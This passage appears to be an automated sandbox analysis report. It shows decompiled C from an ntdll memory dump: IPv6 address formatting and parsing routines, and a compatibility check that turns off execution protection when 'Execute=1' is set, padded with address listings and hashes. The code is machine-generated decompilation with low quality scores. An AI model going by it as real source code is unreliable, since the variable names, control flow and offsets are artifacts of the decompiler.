                                                                                                                                                                0x00b58999
                                                                                                                                                                0x00b589ad
                                                                                                                                                                0x00ba1ba8
                                                                                                                                                                0x00ba1ba8
                                                                                                                                                                0x00b589ad
                                                                                                                                                                0x00b589b6
                                                                                                                                                                0x00b589c8
                                                                                                                                                                0x00b589cd
                                                                                                                                                                0x00b589d0
                                                                                                                                                                0x00b589d0
                                                                                                                                                                0x00b589d6
                                                                                                                                                                0x00b589e8
                                                                                                                                                                0x00b589e8
                                                                                                                                                                0x00b589ed
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b589ed
                                                                                                                                                                0x00b5895a
                                                                                                                                                                0x00b5883e
                                                                                                                                                                0x00b58841
                                                                                                                                                                0x00b58844
                                                                                                                                                                0x00b58845
                                                                                                                                                                0x00b58848
                                                                                                                                                                0x00b5884d
                                                                                                                                                                0x00b58852
                                                                                                                                                                0x00b58b49
                                                                                                                                                                0x00b58858
                                                                                                                                                                0x00b5886c
                                                                                                                                                                0x00b5886c
                                                                                                                                                                0x00b58872
                                                                                                                                                                0x00ba1b0e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58878
                                                                                                                                                                0x00b58881
                                                                                                                                                                0x00b5888b
                                                                                                                                                                0x00b5888e
                                                                                                                                                                0x00b58891
                                                                                                                                                                0x00b58896
                                                                                                                                                                0x00b58899
                                                                                                                                                                0x00b58899
                                                                                                                                                                0x00b5889e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00ba1b21
                                                                                                                                                                0x00ba1b27
                                                                                                                                                                0x00ba1b2e
                                                                                                                                                                0x00ba1b42
                                                                                                                                                                0x00ba1b44
                                                                                                                                                                0x00ba1b44
                                                                                                                                                                0x00ba1b4c
                                                                                                                                                                0x00ba1b4f
                                                                                                                                                                0x00ba1b55
                                                                                                                                                                0x00ba1b55
                                                                                                                                                                0x00b588a4
                                                                                                                                                                0x00b588aa
                                                                                                                                                                0x00b588b1
                                                                                                                                                                0x00b588c5
                                                                                                                                                                0x00ba1b5b
                                                                                                                                                                0x00ba1b5b
                                                                                                                                                                0x00b588c5
                                                                                                                                                                0x00b588ce
                                                                                                                                                                0x00b588e0
                                                                                                                                                                0x00b588e5
                                                                                                                                                                0x00b588e8
                                                                                                                                                                0x00b588e8
                                                                                                                                                                0x00b588ee
                                                                                                                                                                0x00b58900
                                                                                                                                                                0x00b58900
                                                                                                                                                                0x00b58905
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b58905

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                • Kernel-MUI-Language-SKU, xrefs: 00B589FC
                                                                                                                                                                • Kernel-MUI-Language-Disallowed, xrefs: 00B58914
                                                                                                                                                                • Kernel-MUI-Number-Allowed, xrefs: 00B587E6
                                                                                                                                                                • Kernel-MUI-Language-Allowed, xrefs: 00B58827
                                                                                                                                                                • WindowsExcludedProcs, xrefs: 00B587C1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _wcspbrk
                                                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                • API String ID: 402402107-258546922
                                                                                                                                                                • Opcode ID: ad0f9ad0cc54f5f7c18a4a8ca2a3fd27d9f6101e6f2917ecea5988ecf7228a67
                                                                                                                                                                • Instruction ID: 20a2520b83cf2399e17c804b50615350ed1fabb73089bcbdc62a60321fa9bddf
                                                                                                                                                                • Opcode Fuzzy Hash: ad0f9ad0cc54f5f7c18a4a8ca2a3fd27d9f6101e6f2917ecea5988ecf7228a67
                                                                                                                                                                • Instruction Fuzzy Hash: 36F1C5B2D00209EFCF51DF95C981AEEB7F8FB08301F2444EAE915A7251EB359A45DB60
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                			E00B713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00B67707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0xb32926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00B67707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0xb39cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00B67707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00B67707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00B67707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00B67707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                                                                                                                0x00b713d5
                                                                                                                                                                0x00b713d9
                                                                                                                                                                0x00b713dc
                                                                                                                                                                0x00b713de
                                                                                                                                                                0x00b713e1
                                                                                                                                                                0x00b713e8
                                                                                                                                                                0x00b713ee
                                                                                                                                                                0x00b9e8fd
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e921
                                                                                                                                                                0x00b9e921
                                                                                                                                                                0x00b9e928
                                                                                                                                                                0x00b9e982
                                                                                                                                                                0x00b9e98a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e99a
                                                                                                                                                                0x00b9e99e
                                                                                                                                                                0x00b9e9a3
                                                                                                                                                                0x00b9e9a8
                                                                                                                                                                0x00b9e9b9
                                                                                                                                                                0x00b9e978
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e978
                                                                                                                                                                0x00b9e98a
                                                                                                                                                                0x00b9e92a
                                                                                                                                                                0x00b9e931
                                                                                                                                                                0x00b9e944
                                                                                                                                                                0x00b9e944
                                                                                                                                                                0x00b9e950
                                                                                                                                                                0x00b9e954
                                                                                                                                                                0x00b9e959
                                                                                                                                                                0x00b9e95e
                                                                                                                                                                0x00b9e963
                                                                                                                                                                0x00b9e970
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e975
                                                                                                                                                                0x00b9e93b
                                                                                                                                                                0x00b9e980
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e980
                                                                                                                                                                0x00b9e942
                                                                                                                                                                0x00b9e94b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e94b
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b9e942
                                                                                                                                                                0x00b713f4
                                                                                                                                                                0x00b713f4
                                                                                                                                                                0x00b713f9
                                                                                                                                                                0x00b713fc
                                                                                                                                                                0x00b713ff
                                                                                                                                                                0x00b71406
                                                                                                                                                                0x00b9e9cc
                                                                                                                                                                0x00b9e9d2
                                                                                                                                                                0x00b9e9d2
                                                                                                                                                                0x00b9e9cc
                                                                                                                                                                0x00b7140c
                                                                                                                                                                0x00b71411
                                                                                                                                                                0x00b71431
                                                                                                                                                                0x00b7143a
                                                                                                                                                                0x00b7143c
                                                                                                                                                                0x00b7143f
                                                                                                                                                                0x00b7143f
                                                                                                                                                                0x00b71442
                                                                                                                                                                0x00b71447
                                                                                                                                                                0x00b714a8
                                                                                                                                                                0x00b714ac
                                                                                                                                                                0x00b9e9e2
                                                                                                                                                                0x00b9e9e7
                                                                                                                                                                0x00b9e9ec
                                                                                                                                                                0x00b9ea05
                                                                                                                                                                0x00b9ea05
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b71449
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b71449
                                                                                                                                                                0x00b7144c
                                                                                                                                                                0x00b71459
                                                                                                                                                                0x00b71462
                                                                                                                                                                0x00b71469
                                                                                                                                                                0x00b7146a
                                                                                                                                                                0x00b71470
                                                                                                                                                                0x00b71473
                                                                                                                                                                0x00b71476
                                                                                                                                                                0x00b71476
                                                                                                                                                                0x00b71490
                                                                                                                                                                0x00b71495
                                                                                                                                                                0x00b7138e
                                                                                                                                                                0x00b71390
                                                                                                                                                                0x00b71397
                                                                                                                                                                0x00b71398
                                                                                                                                                                0x00b71399
                                                                                                                                                                0x00b713a1
                                                                                                                                                                0x00b713a4
                                                                                                                                                                0x00b713a4
                                                                                                                                                                0x00b71498
                                                                                                                                                                0x00b7149c
                                                                                                                                                                0x00b7149f
                                                                                                                                                                0x00b714a2
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b714a4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b714a4
                                                                                                                                                                0x00b71413
                                                                                                                                                                0x00b71415
                                                                                                                                                                0x00b71416
                                                                                                                                                                0x00b71419
                                                                                                                                                                0x00b7141c
                                                                                                                                                                0x00b71422
                                                                                                                                                                0x00b713b7
                                                                                                                                                                0x00b713bc
                                                                                                                                                                0x00b713bf
                                                                                                                                                                0x00b713bf
                                                                                                                                                                0x00b713c2
                                                                                                                                                                0x00b71424
                                                                                                                                                                0x00b71424
                                                                                                                                                                0x00b71424
                                                                                                                                                                0x00b71427
                                                                                                                                                                0x00b7142b
                                                                                                                                                                0x00b7142c
                                                                                                                                                                0x00b7142c
                                                                                                                                                                0x00b7142c
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b7141c
                                                                                                                                                                0x00b71411

                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                • Opcode ID: 33e8cfd4deaeee41480564ac8807a593a71b9e2a4725a3cecff008517d550b49
                                                                                                                                                                • Instruction ID: 9cc91461d99c313d92ded62873d11f50b181bbadb5abd0af392c0baa5b5a8fdd
                                                                                                                                                                • Opcode Fuzzy Hash: 33e8cfd4deaeee41480564ac8807a593a71b9e2a4725a3cecff008517d550b49
                                                                                                                                                                • Instruction Fuzzy Hash: 0A6125B1904655AACF34CF5DC8818BEBBF5EF94300B64C9ADF4AA47641D674AA40CB70
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B67EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 64%
                                                                                                                                                                			E00B67EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0xc12088; // 0x776ba9e3
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E00B67F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E00B83F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E00B3DFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0xc14218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E00B83F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E00B40D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E00B83F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E00B48375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E00B83F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E00BAE8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E00B83F92();
					_t38 = 1;
					L2:
					return E00B3E1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                                                                                                                                                                0x00b67f08
                                                                                                                                                                0x00b67f0f
                                                                                                                                                                0x00b67f12
                                                                                                                                                                0x00b67f1b
                                                                                                                                                                0x00b67f31
                                                                                                                                                                0x00b83ead
                                                                                                                                                                0x00b83eb4
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b83eba
                                                                                                                                                                0x00b83ecd
                                                                                                                                                                0x00b83ed2
                                                                                                                                                                0x00b83ee1
                                                                                                                                                                0x00b83ee7
                                                                                                                                                                0x00b83eec
                                                                                                                                                                0x00b83f12
                                                                                                                                                                0x00b83f18
                                                                                                                                                                0x00b83f1a
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b83f20
                                                                                                                                                                0x00b83f26
                                                                                                                                                                0x00b83f28
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b83f2e
                                                                                                                                                                0x00b83f30
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b83f3a
                                                                                                                                                                0x00b83f3b
                                                                                                                                                                0x00b83f53
                                                                                                                                                                0x00b83f64
                                                                                                                                                                0x00b83f69
                                                                                                                                                                0x00b83f6c
                                                                                                                                                                0x00b83f6d
                                                                                                                                                                0x00b83f6f
                                                                                                                                                                0x00b8e304
                                                                                                                                                                0x00b8e30f
                                                                                                                                                                0x00b8e315
                                                                                                                                                                0x00b8e31e
                                                                                                                                                                0x00b8e321
                                                                                                                                                                0x00b8e327
                                                                                                                                                                0x00b8e329
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b8e32f
                                                                                                                                                                0x00b8e32f
                                                                                                                                                                0x00b8e337
                                                                                                                                                                0x00b8e33a
                                                                                                                                                                0x00b8e33b
                                                                                                                                                                0x00b8e33d
                                                                                                                                                                0x00b8e33f
                                                                                                                                                                0x00b8e341
                                                                                                                                                                0x00b8e341
                                                                                                                                                                0x00b8e34e
                                                                                                                                                                0x00b8e353
                                                                                                                                                                0x00b8e358
                                                                                                                                                                0x00b8e35d
                                                                                                                                                                0x00b8e35f
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b8e365
                                                                                                                                                                0x00b8e365
                                                                                                                                                                0x00b8e368
                                                                                                                                                                0x00b8e36e
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00000000
                                                                                                                                                                0x00b8e374
                                                                                                                                                                0x00b8e32f
                                                                                                                                                                0x00b83f75
                                                                                                                                                                0x00b83f7a
                                                                                                                                                                0x00b83f7c
                                                                                                                                                                0x00b83f7e
                                                                                                                                                                0x00b83f86
                                                                                                                                                                0x00b67f39
                                                                                                                                                                0x00b67f47
                                                                                                                                                                0x00b67f47
                                                                                                                                                                0x00b67f37
                                                                                                                                                                0x00b67f37
                                                                                                                                                                0x00000000

                                                                                                                                                                APIs
                                                                                                                                                                • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 00B83F12
                                                                                                                                                                Strings
                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00B8E2FB
                                                                                                                                                                • Execute=1, xrefs: 00B83F5E
                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 00B8E345
                                                                                                                                                                • ExecuteOptions, xrefs: 00B83F04
                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00B83F75
                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00B83EC4
                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00B83F4A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000007.00000002.2230244380.0000000000B20000.00000040.00000001.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                • Associated: 00000007.00000002.2230238371.0000000000B10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230340833.0000000000C00000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230350054.0000000000C10000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230361178.0000000000C14000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230375338.0000000000C17000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230387163.0000000000C20000.00000040.00000001.sdmp Download File
                                                                                                                                                                • Associated: 00000007.00000002.2230429009.0000000000C80000.00000040.00000001.sdmp Download File
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: BaseDataModuleQuery
                                                                                                                                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                • API String ID: 3901378454-484625025
                                                                                                                                                                • Opcode ID: 3fced2713f9c9a780d2cd906010a0f2dbdc8063921e2b87ae2609a8ac7fa194d
                                                                                                                                                                • Instruction ID: 4c04fe3a5d090bc490e485a34ebd60c6971ea973dda6345015f379468b064c94
                                                                                                                                                                • Opcode Fuzzy Hash: 3fced2713f9c9a780d2cd906010a0f2dbdc8063921e2b87ae2609a8ac7fa194d
                                                                                                                                                                • Instruction Fuzzy Hash: 7341A671A8021CBBDB20AB94DCD6FDA73FCAF14B04F1005E9B605A6091EA70DF45CBA1
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 00B70B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                			E00B70B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E00B48980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E00B3DFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E00B70CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E00B70CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E00B706BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E00B706BA(_t135, _t178) == 0 || E00B70A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E00B70CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E00B70CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E00B706BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E00B706BA(_t124, _t142) == 0 || E00B70A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                                                                                                                                                                0x00b70b21
                                                                                                                                                                0x00b70b24
